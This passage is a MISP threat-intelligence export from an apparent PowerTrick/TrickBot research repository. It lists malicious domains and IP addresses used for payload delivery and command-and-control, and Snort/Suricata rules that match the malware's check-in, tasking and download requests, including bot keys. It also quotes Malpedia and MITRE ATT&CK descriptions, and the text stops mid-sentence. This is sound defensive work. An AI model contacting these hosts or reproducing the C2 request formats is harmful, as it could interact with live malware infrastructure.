├── IOCs ├── 2020-01-08-powetrick-iocs-vk-misp-json.json └── 2020-01-08-powetrick-iocs-vk-misp-json.json .csv ├── README.md └── mock_panel ├── first.ps1 ├── generic_version.php ├── index_first.php ├── readme.txt └── second.ps1 /IOCs/2020-01-08-powetrick-iocs-vk-misp-json.json: -------------------------------------------------------------------------------- 1 | {"response": [{"Event":{"id":"1295","orgc_id":"1","org_id":"1","date":"2020-01-08","threat_level_id":"2","info":"2020-01-08: PowerTrick IOCs","published":true,"uuid":"5e15e78b-86a0-4665-8047-2a6168f8e8cf","attribute_count":"15","analysis":"0","timestamp":"1578495272","distribution":"1","proposal_email_lock":false,"locked":false,"publish_timestamp":"1578495353","sharing_group_id":"0","disable_correlation":false,"extends_uuid":"","event_creator_email":"vitali.kremez@gmail.com","Org":{"id":"1","name":"VK_INTEL_EVIL","uuid":"5d2fbc3a-e520-4bf9-89b7-1b0a68f8e8cf"},"Orgc":{"id":"1","name":"VK_INTEL_EVIL","uuid":"5d2fbc3a-e520-4bf9-89b7-1b0a68f8e8cf"},"Attribute":[{"id":"227827","type":"domain","category":"Payload delivery","to_ids":true,"uuid":"5e15e7b0-dfe0-4f86-83de-2a9e19d2faa1","event_id":"1295","distribution":"5","timestamp":"1578493872","comment":"","sharing_group_id":"0","deleted":false,"disable_correlation":false,"object_id":"0","object_relation":null,"value":"drive.staticcontent.kz","Galaxy":[],"ShadowAttribute":[]},{"id":"227828","type":"domain","category":"Network activity","to_ids":true,"uuid":"5e15e7b0-e1dc-4635-b973-2a9e19d2faa1","event_id":"1295","distribution":"5","timestamp":"1578493872","comment":"","sharing_group_id":"0","deleted":false,"disable_correlation":false,"object_id":"0","object_relation":null,"value":"web000aaa.info","Galaxy":[],"ShadowAttribute":[]},{"id":"227829","type":"domain","category":"Network 
activity","to_ids":true,"uuid":"5e15e7b0-36c0-4ede-8b82-2a9e19d2faa1","event_id":"1295","distribution":"5","timestamp":"1578493872","comment":"","sharing_group_id":"0","deleted":false,"disable_correlation":false,"object_id":"0","object_relation":null,"value":"traveldials.com","Galaxy":[],"ShadowAttribute":[]},{"id":"227830","type":"domain","category":"Network activity","to_ids":true,"uuid":"5e15e7b0-3c94-4496-adb9-2a9e19d2faa1","event_id":"1295","distribution":"5","timestamp":"1578493872","comment":"","sharing_group_id":"0","deleted":false,"disable_correlation":false,"object_id":"0","object_relation":null,"value":"northtracing.net","Galaxy":[],"ShadowAttribute":[]},{"id":"227831","type":"domain","category":"Network activity","to_ids":true,"uuid":"5e15e7b0-7830-468a-a262-2a9e19d2faa1","event_id":"1295","distribution":"5","timestamp":"1578493872","comment":"","sharing_group_id":"0","deleted":false,"disable_correlation":false,"object_id":"0","object_relation":null,"value":"magikorigin.me","Galaxy":[],"ShadowAttribute":[]},{"id":"227832","type":"ip-dst","category":"Network activity","to_ids":true,"uuid":"5e15e7b0-9ea0-42a5-a643-2a9e19d2faa1","event_id":"1295","distribution":"5","timestamp":"1578493872","comment":"","sharing_group_id":"0","deleted":false,"disable_correlation":false,"object_id":"0","object_relation":null,"value":"5.9.161.246","Galaxy":[],"ShadowAttribute":[]},{"id":"227833","type":"ip-dst","category":"Network activity","to_ids":true,"uuid":"5e15e7b1-3ef8-4abc-ae54-2a9e19d2faa1","event_id":"1295","distribution":"5","timestamp":"1578493873","comment":"","sharing_group_id":"0","deleted":false,"disable_correlation":false,"object_id":"0","object_relation":null,"value":"192.99.38.41","Galaxy":[],"ShadowAttribute":[]},{"id":"227834","type":"snort","category":"Network activity","to_ids":true,"uuid":"5e15ed28-80e4-43e2-baa4-2a9968f8e8cf","event_id":"1295","distribution":"5","timestamp":"1578495272","comment":"Snort\/Suricata IDS 
Rules","sharing_group_id":"0","deleted":false,"disable_correlation":false,"object_id":"0","object_relation":null,"value":"alert http $HOME_NET any -> $EXTERNAL_NET any (msg:\"PowerTrick Task Request\"; content:\"POST\"; http_method; content:\"p=t&p1=\"; offset:0; depth:7; http_client_body; classtype:trojan-activity; sid:9000019; rev:1; metadata:author Jason Reaves;)","Galaxy":[],"ShadowAttribute":[]},{"id":"227835","type":"snort","category":"Network activity","to_ids":true,"uuid":"5e15ed28-9d20-465c-b6d9-2a9968f8e8cf","event_id":"1295","distribution":"5","timestamp":"1578495272","comment":"Snort\/Suricata IDS Rules","sharing_group_id":"0","deleted":false,"disable_correlation":false,"object_id":"0","object_relation":null,"value":"alert http $HOME_NET any -> $EXTERNAL_NET any (msg:\"PowerTrick Task Checkin\"; content:\"POST\"; http_method; content:\"p3=\"; offset:0; depth:3; http_client_body; content:\"p=i\"; http_client_body; content:\"p1=\"; http_client_body; content:\"p2=\"; http_client_body; content:\"p9=\"; http_client_body; classtype:trojan-activity; sid:9000020; rev:1; metadata:author Jason Reaves;)","Galaxy":[],"ShadowAttribute":[]},{"id":"227836","type":"snort","category":"Network activity","to_ids":true,"uuid":"5e15ed28-6c04-4d0a-a38a-2a9968f8e8cf","event_id":"1295","distribution":"5","timestamp":"1578495272","comment":"Snort\/Suricata IDS Rules","sharing_group_id":"0","deleted":false,"disable_correlation":false,"object_id":"0","object_relation":null,"value":"alert http $HOME_NET any -> $EXTERNAL_NET any (msg:\"PowerTrick Task Answer\"; content:\"POST\"; http_method; content:\"p3=\"; offset:0; depth:3; http_client_body; content:\"&p5=\"; http_client_body; content:\"&p=a&\"; http_client_body; content:\"&p1=\"; http_client_body; content:\"&p9=\"; http_client_body; classtype:trojan-activity; sid:9000021; rev:1; metadata:author Jason Reaves;)","Galaxy":[],"ShadowAttribute":[]},{"id":"227837","type":"snort","category":"Network 
activity","to_ids":true,"uuid":"5e15ed28-2634-412d-bff7-2a9968f8e8cf","event_id":"1295","distribution":"5","timestamp":"1578495272","comment":"Snort\/Suricata IDS Rules","sharing_group_id":"0","deleted":false,"disable_correlation":false,"object_id":"0","object_relation":null,"value":"alert http $HOME_NET any -> $EXTERNAL_NET any (msg:\"PowerTrick Known Key 1\"; content:\"POST\"; http_method; content:\"p1=P4YCVQER8UWpfzxVFmVSDyBLzKL3yV6c\"; http_client_body; classtype:trojan-activity; sid:9000022; rev:1; metadata:author Jason Reaves;)","Galaxy":[],"ShadowAttribute":[]},{"id":"227838","type":"snort","category":"Network activity","to_ids":true,"uuid":"5e15ed28-ce08-43f4-b248-2a9968f8e8cf","event_id":"1295","distribution":"5","timestamp":"1578495272","comment":"Snort\/Suricata IDS Rules","sharing_group_id":"0","deleted":false,"disable_correlation":false,"object_id":"0","object_relation":null,"value":"alert http $HOME_NET any -> $EXTERNAL_NET any (msg:\"PowerTrick Known Key 2\"; content:\"POST\"; http_method; content:\"p1=ybEsTxhqPuN4uVkemt6WjxaJN8jBdAGLxKeY9a4CnMTLSSq2\"; http_client_body; classtype:trojan-activity; sid:9000026; rev:1; metadata:author Jason Reaves;)","Galaxy":[],"ShadowAttribute":[]},{"id":"227839","type":"snort","category":"Network activity","to_ids":true,"uuid":"5e15ed28-6060-43cd-9ea8-2a9968f8e8cf","event_id":"1295","distribution":"5","timestamp":"1578495272","comment":"Snort\/Suricata IDS Rules","sharing_group_id":"0","deleted":false,"disable_correlation":false,"object_id":"0","object_relation":null,"value":"alert http $HOME_NET any -> $EXTERNAL_NET any (msg:\"PowerTrick download ver1 bot\"; content:\"?x=UDRZQ1ZRRVI4VVdwZnp4VkZtVlNEeUJMektMM3lWNmM=&a=ips\"; http_uri; classtype:trojan-activity; sid:9000023; rev:1; metadata:author Jason Reaves;)","Galaxy":[],"ShadowAttribute":[]},{"id":"227840","type":"snort","category":"Network 
activity","to_ids":true,"uuid":"5e15ed28-2a94-49c8-9df5-2a9968f8e8cf","event_id":"1295","distribution":"5","timestamp":"1578495272","comment":"Snort\/Suricata IDS Rules","sharing_group_id":"0","deleted":false,"disable_correlation":false,"object_id":"0","object_relation":null,"value":"alert http $HOME_NET any -> $EXTERNAL_NET any (msg:\"PowerTrick download ver2 bot\"; content:\"?a=irs&x=\"; http_uri; classtype:trojan-activity; sid:9000024; rev:1; metadata:author Jason Reaves;)","Galaxy":[],"ShadowAttribute":[]},{"id":"227841","type":"snort","category":"Network activity","to_ids":true,"uuid":"5e15ed28-de84-40c0-958f-2a9968f8e8cf","event_id":"1295","distribution":"5","timestamp":"1578495272","comment":"Snort\/Suricata IDS Rules","sharing_group_id":"0","deleted":false,"disable_correlation":false,"object_id":"0","object_relation":null,"value":"alert http $HOME_NET any -> $EXTERNAL_NET any (msg:\"PowerTrick download bot known key\"; content:\"?x=UDRZQ1ZRRVI4VVdwZnp4VkZtVlNEeUJMektMM3lWNmM\"; http_uri; classtype:trojan-activity; sid:9000025; rev:1; metadata:author Jason Reaves;)","Galaxy":[],"ShadowAttribute":[]}],"ShadowAttribute":[],"RelatedEvent":[],"Galaxy":[{"id":"30","uuid":"1d1c9af9-37fa-4deb-a928-f9b0abc7354a","name":"Malpedia","type":"malpedia","description":"Malware galaxy based on Malpedia archive.","version":"1","icon":"shield","namespace":"misp","GalaxyCluster":[{"id":"4907","collection_uuid":"5fc98d08-90a4-498a-ad2e-0edf50ef374e","type":"malpedia","value":"TrickBot","tag_name":"misp-galaxy:malpedia=\"TrickBot\"","description":"A financial Trojan believed to be a derivative of Dyre: the bot uses very similar code, web injects, and operational tactics. Has multiple modules including VNC and Socks5 Proxy. Uses SSL for C2 communication.\r\n\r\n- Q4 2016 - Detected in wild\r\nOct 2016 - 1st Report\r\nJan 2018 - Use XMRIG (Monero) miner\r\nFeb 2018 - Theft Bitcoin\r\nMar 2018 - Unfinished ransomware module\r\n\r\nInfection Vector\r\n1. 
Phish > Link MS Office > Macro Enabled > Downloader > Trickbot\r\n2. Phish > Attached MS Office > Macro Enabled > Downloader > Trickbot\r\n3. Phish > Attached MS Office > Macro enabled > Trickbot installed","galaxy_id":"30","source":"Malpedia","authors":["Davide Arcuri","Alexandre Dulaunoy","Steffen Enders","Andrea Garavaglia","Andras Iklody","Daniel Plohmann","Christophe Vandeplas"],"version":"2560","uuid":"c824813c-9c79-4917-829a-af72529e8329","tag_id":"31","meta":{"refs":["https:\/\/malpedia.caad.fkie.fraunhofer.de\/details\/win.trickbot","https:\/\/www.cybereason.com\/blog\/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware","https:\/\/blog.malwarebytes.com\/threat-analysis\/2017\/08\/trickbot-comes-with-new-tricks-attacking-outlook-and-browsing-data\/","http:\/\/www.vkremez.com\/2017\/11\/lets-learn-trickbot-socks5-backconnect.html","https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/trickbot-adds-remote-application-credential-grabbing-capabilities-to-its-repertoire\/","http:\/\/www.vkremez.com\/2017\/12\/lets-learn-introducing-new-trickbot.html","https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/trickbot-shows-off-new-trick-password-grabber-module","https:\/\/www.fidelissecurity.com\/threatgeek\/2016\/10\/trickbot-we-missed-you-dyre","https:\/\/www.flashpoint-intel.com\/blog\/trickbot-account-checking-hybrid-attack-model\/","http:\/\/www.peppermalware.com\/2019\/03\/quick-analysis-of-trickbot-sample-with.html","https:\/\/blog.malwarebytes.com\/threat-analysis\/2016\/10\/trick-bot-dyrezas-successor\/","https:\/\/www.youtube.com\/watch?v=KMcSAlS9zGE","https:\/\/www.crowdstrike.com\/blog\/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web\/","https:\/\/www.arbornetworks.com\/blog\/asert\/trickbot-banker-insights\/","https:\/\/blog.malwarebytes.com\/threat-analysis\/malware-threat-analysis\/2018\/11\/whats-new-trickbot-deobfuscating-elements\/","https:\/\/www.trustwave.com\/Resources\/SpiderLabs-B
log\/Tale-of-the-Two-Payloads-%E2%80%93-TrickBot-and-Nitol\/","http:\/\/www.vkremez.com\/2018\/04\/lets-learn-trickbot-implements-network.html","https:\/\/securityintelligence.com\/trickbot-takes-to-latin-america-continues-to-expand-its-global-reach\/","https:\/\/qmemcpy.io\/post\/reverse-engineering-malware-trickbot-part-2-loader","https:\/\/www.fireeye.com\/blog\/threat-research\/2019\/01\/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html","https:\/\/securityintelligence.com\/trickbots-cryptocurrency-hunger-tricking-the-bitcoin-out-of-wallets\/","https:\/\/blog.fraudwatchinternational.com\/malware\/trickbot-malware-works","https:\/\/www.blueliv.com\/research\/trickbot-banking-trojan-using-eflags-as-an-anti-hook-technique\/","https:\/\/f5.com\/labs\/articles\/threat-intelligence\/malware\/trickbot-expands-global-targets-beyond-banks-and-payment-processors-to-crms","https:\/\/f5.com\/labs\/articles\/threat-intelligence\/malware\/little-trickbot-growing-up-new-campaign-24412","https:\/\/github.com\/JR0driguezB\/malware_configs\/tree\/master\/TrickBot","https:\/\/escinsecurity.blogspot.de\/2018\/01\/weekly-trickbot-analysis-end-of-wc-22.html","https:\/\/www.webroot.com\/blog\/2018\/03\/21\/trickbot-banking-trojan-adapts-new-module\/","https:\/\/www.fortinet.com\/blog\/threat-research\/deep-analysis-of-trickbot-new-module-pwgrab.html","https:\/\/www.securityartwork.es\/wp-content\/uploads\/2017\/06\/Informe_Evoluci%C3%B3n_Trickbot.pdf","https:\/\/blogs.forcepoint.com\/security-labs\/trickbot-spread-necurs-botnet-adds-nordic-countries-its-targets","http:\/\/blog.fortinet.com\/2016\/12\/06\/deep-analysis-of-the-online-banking-botnet-trickbot","https:\/\/www.cyberbit.com\/blog\/endpoint-security\/latest-trickbot-variant-has-new-tricks-up-its-sleeve\/","http:\/\/www.malware-traffic-analysis.net\/2018\/02\/01\/","https:\/\/www.cert.pl\/en\/news\/single\/detricking-trickbot-loader\/","https:\/\/www.trendmicro.com\/vinfo\/us\/security\/news\/cybercrime-a
nd-digital-threats\/evolving-trickbot-adds-detection-evasion-and-screen-locking-features","https:\/\/securityintelligence.com\/tricks-of-the-trade-a-deeper-look-into-trickbots-machinations\/","http:\/\/www.pwc.co.uk\/issues\/cyber-security-data-privacy\/research\/trickbots-bag-of-tricks.html","https:\/\/qmemcpy.io\/post\/reverse-engineering-malware-trickbot-part-3-core","https:\/\/www.ringzerolabs.com\/2017\/07\/trickbot-banking-trojan-doc00039217doc.html","https:\/\/www.youtube.com\/watch?v=EdchPEHnohw","https:\/\/sysopfb.github.io\/malware\/2018\/04\/16\/trickbot-uacme.html","https:\/\/blog.talosintelligence.com\/2018\/07\/smoking-guns-smoke-loader-learned-new.html","https:\/\/www.vkremez.com\/2018\/11\/lets-learn-introducing-latest-trickbot.html","https:\/\/www.youtube.com\/watch?v=lTywPmZEU1A","https:\/\/qmemcpy.github.io\/post\/reverse-engineering-malware-trickbot-part-1-packer","https:\/\/www.botconf.eu\/wp-content\/uploads\/2016\/11\/2016-LT09-TrickBot-Adams.pdf","https:\/\/www.flashpoint-intel.com\/blog\/new-version-trickbot-adds-worm-propagation-module\/"],"synonyms":["TheTrick","TrickLoader","Trickster"]},"local":false}]},{"id":"9","uuid":"c4e851fa-775f-11e7-8163-b774922098cd","name":"Attack Pattern","type":"mitre-attack-pattern","description":"ATT&CK 
Tactic","version":"8","icon":"map","namespace":"mitre-attack","kill_chain_order":{"mitre-attack":["initial-access","execution","persistence","privilege-escalation","defense-evasion","credential-access","discovery","lateral-movement","collection","command-and-control","exfiltration","impact"],"mitre-mobile-attack":["initial-access","persistence","privilege-escalation","defense-evasion","credential-access","discovery","lateral-movement","effects","collection","exfiltration","command-and-control","network-effects","remote-service-effects"],"mitre-pre-attack":["priority-definition-planning","priority-definition-direction","target-selection","technical-information-gathering","people-information-gathering","organizational-information-gathering","technical-weakness-identification","people-weakness-identification","organizational-weakness-identification","adversary-opsec","establish-&-maintain-infrastructure","persona-development","build-capabilities","test-capabilities","stage-capabilities"]},"GalaxyCluster":[{"id":"1199","collection_uuid":"dcb864dc-775f-11e7-9fbb-1f41b4996683","type":"mitre-attack-pattern","value":"Spearphishing Link - T1192","tag_name":"misp-galaxy:mitre-attack-pattern=\"Spearphishing Link - T1192\"","description":"Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. \n\nAll forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this case, the malicious emails contain links. Generally, the links will be accompanied by social engineering text and require the user to actively click or copy and paste a URL into a browser, leveraging [User Execution](https:\/\/attack.mitre.org\/techniques\/T1204). 
The visited website may compromise the web browser using an exploit, or the user will be prompted to download applications, documents, zip files, or even executables depending on the pretext for the email in the first place. Adversaries may also include links that are intended to interact directly with an email reader, including embedded images intended to exploit the end system directly or verify the receipt of an email (i.e. web bugs\/web beacons).","galaxy_id":"9","source":"https:\/\/github.com\/mitre\/cti","authors":["MITRE"],"version":"9","uuid":"20138b9d-1aac-4a26-8654-a36b6bbf2bba","tag_id":"726","meta":{"external_id":["CAPEC-163"],"kill_chain":["mitre-attack:initial-access"],"mitre_data_sources":["Packet capture","Web proxy","Email gateway","Detonation chamber","SSL\/TLS inspection","DNS records","Mail server"],"mitre_platforms":["Windows","macOS","Linux"],"refs":["https:\/\/attack.mitre.org\/techniques\/T1192","https:\/\/capec.mitre.org\/data\/definitions\/163.html"]},"local":false},{"id":"1205","collection_uuid":"dcb864dc-775f-11e7-9fbb-1f41b4996683","type":"mitre-attack-pattern","value":"Spearphishing Attachment - T1193","tag_name":"misp-galaxy:mitre-attack-pattern=\"Spearphishing Attachment - T1193\"","description":"Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon [User Execution](https:\/\/attack.mitre.org\/techniques\/T1204) to gain execution.\n\nThere are many options for the attachment such as Microsoft Office documents, executables, PDFs, or archived files. 
Upon opening the attachment (and potentially clicking past protections), the adversary's payload exploits a vulnerability or directly executes on the user's system. The text of the spearphishing email usually tries to give a plausible reason why the file should be opened, and may explain how to bypass system protections in order to do so. The email may also contain instructions on how to decrypt an attachment, such as a zip file password, in order to evade email boundary defenses. Adversaries frequently manipulate file extensions and icons in order to make attached executables appear to be document files, or files exploiting one application appear to be a file for a different one.","galaxy_id":"9","source":"https:\/\/github.com\/mitre\/cti","authors":["MITRE"],"version":"9","uuid":"6aac77c4-eaf2-4366-8c13-ce50ab951f38","tag_id":"727","meta":{"external_id":["CAPEC-163"],"kill_chain":["mitre-attack:initial-access"],"mitre_data_sources":["File monitoring","Packet capture","Network intrusion detection system","Detonation chamber","Email gateway","Mail server"],"mitre_platforms":["Windows","macOS","Linux"],"refs":["https:\/\/attack.mitre.org\/techniques\/T1193","https:\/\/capec.mitre.org\/data\/definitions\/163.html"]},"local":false},{"id":"1050","collection_uuid":"dcb864dc-775f-11e7-9fbb-1f41b4996683","type":"mitre-attack-pattern","value":"Supply Chain Compromise - T1195","tag_name":"misp-galaxy:mitre-attack-pattern=\"Supply Chain Compromise - T1195\"","description":"Supply chain compromise is the manipulation of products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise. 
\n\nSupply chain compromise can take place at any stage of the supply chain including:\n\n* Manipulation of development tools\n* Manipulation of a development environment\n* Manipulation of source code repositories (public or private)\n* Manipulation of source code in open-source dependencies\n* Manipulation of software update\/distribution mechanisms\n* Compromised\/infected system images (multiple cases of removable media infected at the factory)\n* Replacement of legitimate software with modified versions\n* Sales of modified\/counterfeit products to legitimate distributors\n* Shipment interdiction\n\nWhile supply chain compromise can impact any component of hardware or software, attackers looking to gain execution have often focused on malicious additions to legitimate software in software distribution or update channels. (Citation: Avast CCleaner3 2018) (Citation: Microsoft Dofoil 2018) (Citation: Command Five SK 2011) Targeting may be specific to a desired victim set (Citation: Symantec Elderwood Sept 2012) or malicious software may be distributed to a broad set of consumers but only move on to additional tactics on specific victims. (Citation: Avast CCleaner3 2018) (Citation: Command Five SK 2011) Popular open source projects that are used as dependencies in many applications may also be targeted as a means to add malicious code to users of the dependency. 
(Citation: Trendmicro NPM Compromise)","galaxy_id":"9","source":"https:\/\/github.com\/mitre\/cti","authors":["MITRE"],"version":"9","uuid":"3f18edba-28f4-4bb9-82c3-8aa60dcac5f7","tag_id":"763","meta":{"external_id":["CAPEC-439"],"kill_chain":["mitre-attack:initial-access"],"mitre_data_sources":["Web proxy","File monitoring"],"mitre_platforms":["Linux","Windows","macOS"],"refs":["https:\/\/attack.mitre.org\/techniques\/T1195","https:\/\/capec.mitre.org\/data\/definitions\/437.html","https:\/\/capec.mitre.org\/data\/definitions\/438.html","https:\/\/capec.mitre.org\/data\/definitions\/439.html","https:\/\/blog.avast.com\/new-investigations-in-ccleaner-incident-point-to-a-possible-third-stage-that-had-keylogger-capacities","https:\/\/cloudblogs.microsoft.com\/microsoftsecure\/2018\/03\/07\/behavior-monitoring-combined-with-machine-learning-spoils-a-massive-dofoil-coin-mining-campaign\/","https:\/\/www.commandfive.com\/papers\/C5_APT_SKHack.pdf","http:\/\/www.symantec.com\/content\/en\/us\/enterprise\/media\/security_response\/whitepapers\/the-elderwood-project.pdf","https:\/\/www.trendmicro.com\/vinfo\/dk\/security\/news\/cybercrime-and-digital-threats\/hacker-infects-node-js-package-to-steal-from-bitcoin-wallets"]},"local":false},{"id":"1115","collection_uuid":"dcb864dc-775f-11e7-9fbb-1f41b4996683","type":"mitre-attack-pattern","value":"Command-Line Interface - T1059","tag_name":"misp-galaxy:mitre-attack-pattern=\"Command-Line Interface - T1059\"","description":"Command-line interfaces provide a way of interacting with computer systems and is a common feature across many types of operating system platforms. (Citation: Wikipedia Command-Line Interface) One example command-line interface on Windows systems is [cmd](https:\/\/attack.mitre.org\/software\/S0106), which can be used to perform a number of tasks including execution of other software. 
Command-line interfaces can be interacted with locally or remotely via a remote desktop application, reverse shell session, etc. Commands that are executed run with the current permission level of the command-line interface process unless the command includes process invocation that changes permissions context for that execution (e.g. [Scheduled Task](https:\/\/attack.mitre.org\/techniques\/T1053)).\n\nAdversaries may use command-line interfaces to interact with systems and execute other software during the course of an operation.","galaxy_id":"9","source":"https:\/\/github.com\/mitre\/cti","authors":["MITRE"],"version":"9","uuid":"7385dfaf-6886-4229-9ecd-6fd678040830","tag_id":"728","meta":{"external_id":["T1059"],"kill_chain":["mitre-attack:execution"],"mitre_data_sources":["Process monitoring","Process command-line parameters"],"mitre_platforms":["Linux","macOS","Windows"],"refs":["https:\/\/attack.mitre.org\/techniques\/T1059","https:\/\/en.wikipedia.org\/wiki\/Command-line_interface"]},"local":false},{"id":"1250","collection_uuid":"dcb864dc-775f-11e7-9fbb-1f41b4996683","type":"mitre-attack-pattern","value":"PowerShell - T1086","tag_name":"misp-galaxy:mitre-attack-pattern=\"PowerShell - T1086\"","description":"PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer. 
\n\nPowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.\n\nAdministrator permissions are required to use PowerShell to connect to remote systems.\n\nA number of PowerShell-based offensive testing tools are available, including [Empire](https:\/\/attack.mitre.org\/software\/S0363), PowerSploit, (Citation: Powersploit) and PSAttack. (Citation: Github PSAttack)\n\nPowerShell commands\/scripts can also be executed without directly invoking the powershell.exe binary through interfaces to PowerShell's underlying System.Management.Automation assembly exposed through the .NET framework and Windows Common Language Interface (CLI). (Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015) (Citation: Microsoft PSfromCsharp APR 2014)","galaxy_id":"9","source":"https:\/\/github.com\/mitre\/cti","authors":["MITRE"],"version":"9","uuid":"f4882e23-8aa7-4b12-b28a-b349c12ee9e0","tag_id":"764","meta":{"external_id":["T1086"],"kill_chain":["mitre-attack:execution"],"mitre_data_sources":["PowerShell logs","Loaded DLLs","DLL monitoring","Windows Registry","File monitoring","Process monitoring","Process command-line 
parameters"],"mitre_platforms":["Windows"],"refs":["https:\/\/attack.mitre.org\/techniques\/T1086","https:\/\/technet.microsoft.com\/en-us\/scriptcenter\/dd742419.aspx","https:\/\/github.com\/mattifestation\/PowerSploit","https:\/\/github.com\/jaredhaight\/PSAttack","http:\/\/www.sixdub.net\/?p=367","https:\/\/silentbreaksecurity.com\/powershell-jobs-without-powershell-exe\/","https:\/\/blogs.msdn.microsoft.com\/kebab\/2014\/04\/28\/executing-powershell-scripts-from-c\/","http:\/\/www.malwarearchaeology.com\/s\/Windows-PowerShell-Logging-Cheat-Sheet-ver-June-2016-v2.pdf","https:\/\/www.fireeye.com\/blog\/threat-research\/2016\/02\/greater_visibilityt.html"]},"local":false},{"id":"1052","collection_uuid":"dcb864dc-775f-11e7-9fbb-1f41b4996683","type":"mitre-attack-pattern","value":"Local Job Scheduling - T1168","tag_name":"misp-galaxy:mitre-attack-pattern=\"Local Job Scheduling - T1168\"","description":"On Linux and macOS systems, multiple methods are supported for creating pre-scheduled and periodic background jobs: cron, (Citation: Die.net Linux crontab Man Page) at, (Citation: Die.net Linux at Man Page) and launchd. (Citation: AppleDocs Scheduling Timed Jobs) Unlike [Scheduled Task](https:\/\/attack.mitre.org\/techniques\/T1053) on Windows systems, job scheduling on Linux-based systems cannot be done remotely unless used in conjunction within an established remote session, like secure shell (SSH).\n\n### cron\n\nSystem-wide cron jobs are installed by modifying \/etc\/crontab<\/code> file, \/etc\/cron.d\/<\/code> directory or other locations supported by the Cron daemon, while per-user cron jobs are installed using crontab with specifically formatted crontab files. (Citation: AppleDocs Scheduling Timed Jobs) This works on macOS and Linux systems.\n\nThose methods allow for commands or scripts to be executed at specific, periodic intervals in the background without user interaction. 
An adversary may use job scheduling to execute programs at system startup or on a scheduled basis for Persistence, (Citation: Janicab) (Citation: Methods of Mac Malware Persistence) (Citation: Malware Persistence on OS X) (Citation: Avast Linux Trojan Cron Persistence) to conduct Execution as part of Lateral Movement, to gain root privileges, or to run a process under the context of a specific account.\n\n### at\n\nThe at program is another means on POSIX-based systems, including macOS and Linux, to schedule a program or script job for execution at a later date and\/or time, which could also be used for the same purposes.\n\n### launchd\n\nEach launchd job is described by a different configuration property list (plist) file similar to [Launch Daemon](https:\/\/attack.mitre.org\/techniques\/T1160) or [Launch Agent](https:\/\/attack.mitre.org\/techniques\/T1159), except there is an additional key called StartCalendarInterval<\/code> with a dictionary of time values. (Citation: AppleDocs Scheduling Timed Jobs) This only works on macOS and OS X.","galaxy_id":"9","source":"https:\/\/github.com\/mitre\/cti","authors":["MITRE"],"version":"9","uuid":"c0a384a4-9a25-40e1-97b6-458388474bc8","tag_id":"765","meta":{"external_id":["T1168"],"kill_chain":["mitre-attack:persistence","mitre-attack:execution"],"mitre_data_sources":["File monitoring","Process 
monitoring"],"mitre_platforms":["Linux","macOS"],"refs":["https:\/\/attack.mitre.org\/techniques\/T1168","https:\/\/developer.apple.com\/library\/content\/documentation\/MacOSX\/Conceptual\/BPSystemStartup\/Chapters\/ScheduledJobs.html","http:\/\/www.thesafemac.com\/new-signed-malware-called-janicab\/","https:\/\/www.virusbulletin.com\/uploads\/pdf\/conference\/vb2014\/VB2014-Wardle.pdf","https:\/\/www.rsaconference.com\/writable\/presentations\/file_upload\/ht-r03-malware-persistence-on-os-x-yosemite_final.pdf","https:\/\/linux.die.net\/man\/5\/crontab","https:\/\/linux.die.net\/man\/1\/at","https:\/\/blog.avast.com\/2015\/01\/06\/linux-ddos-trojan-hiding-itself-with-an-embedded-rootkit\/"]},"local":false},{"id":"1165","collection_uuid":"dcb864dc-775f-11e7-9fbb-1f41b4996683","type":"mitre-attack-pattern","value":"Scheduled Task - T1053","tag_name":"misp-galaxy:mitre-attack-pattern=\"Scheduled Task - T1053\"","description":"Utilities such as [at](https:\/\/attack.mitre.org\/software\/S0110) and [schtasks](https:\/\/attack.mitre.org\/software\/S0111), along with the Windows Task Scheduler, can be used to schedule programs or scripts to be executed at a date and time. A task can also be scheduled on a remote system, provided the proper authentication is met to use RPC and file and printer sharing is turned on. Scheduling a task on a remote system typically requires being a member of the Administrators group on the remote system. 
(Citation: TechNet Task Scheduler Security)\n\nAn adversary may use task scheduling to execute programs at system startup or on a scheduled basis for persistence, to conduct remote Execution as part of Lateral Movement, to gain SYSTEM privileges, or to run a process under the context of a specified account.","galaxy_id":"9","source":"https:\/\/github.com\/mitre\/cti","authors":["MITRE"],"version":"9","uuid":"35dd844a-b219-4e2b-a6bb-efa9a75995a9","tag_id":"766","meta":{"external_id":["CAPEC-557"],"kill_chain":["mitre-attack:execution","mitre-attack:persistence","mitre-attack:privilege-escalation"],"mitre_data_sources":["File monitoring","Process monitoring","Process command-line parameters","Windows event logs"],"mitre_platforms":["Windows"],"refs":["https:\/\/attack.mitre.org\/techniques\/T1053","https:\/\/capec.mitre.org\/data\/definitions\/557.html","https:\/\/technet.microsoft.com\/en-us\/library\/cc785125.aspx","https:\/\/technet.microsoft.com\/en-us\/sysinternals\/bb963902","https:\/\/twitter.com\/leoloobeek\/status\/939248813465853953","https:\/\/social.technet.microsoft.com\/Forums\/en-US\/e5bca729-52e7-4fcb-ba12-3225c564674c\/scheduled-tasks-history-retention-settings?forum=winserver8gen","https:\/\/technet.microsoft.com\/library\/dd315590.aspx"]},"local":false},{"id":"1248","collection_uuid":"dcb864dc-775f-11e7-9fbb-1f41b4996683","type":"mitre-attack-pattern","value":"Scripting - T1064","tag_name":"misp-galaxy:mitre-attack-pattern=\"Scripting - T1064\"","description":"Adversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an 